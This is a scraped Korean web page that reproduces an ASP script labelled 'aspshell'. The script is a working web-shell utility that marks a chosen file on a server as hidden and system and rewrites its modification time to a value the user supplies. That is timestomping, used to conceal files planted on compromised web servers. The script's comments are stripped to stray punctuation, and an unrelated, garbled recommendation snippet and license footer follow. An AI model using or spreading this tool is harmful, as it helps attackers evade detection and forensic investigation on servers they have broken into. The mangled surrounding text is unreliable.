파일 의 시간 과 속성 을 수정 하 는 ASP 스 크 립 트 숨 기기
<%
' aspshell
' : FSO , , , ;FSO attributes ,1 ,2 ,4
' shell.application
'2009/02/24 write by skyfire
response.write "<form method=post>"
response.write " :<input name=path value='"&server.mappath("/")&"' size='30'>( \ )<br />"
response.write " :<input name=filename value='test.txt' size='30'><br />"
response.write " :<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value= >"
response.write "</form>"
'
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")
if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
' fso
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4 ' +
' shell.Application
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime
end if
%>
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
목록 대화 상 자 를 팝 업 합 니 다. 목록 항목 을 선택 한 후 결 과 를 되 돌려 주 고 사라 집 니 다.사용자 가 목록 항목 을 선택 한 후에 사용자 가 선택 한 결 과 를 되 돌려 주 고 현재 목록 항목 이 사라 집 니 다. 이 2 단 코드 는 모니터 방법 밖 에 두 면 단 추 를 누 르 고 시간 을 선택 한 후에 ...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.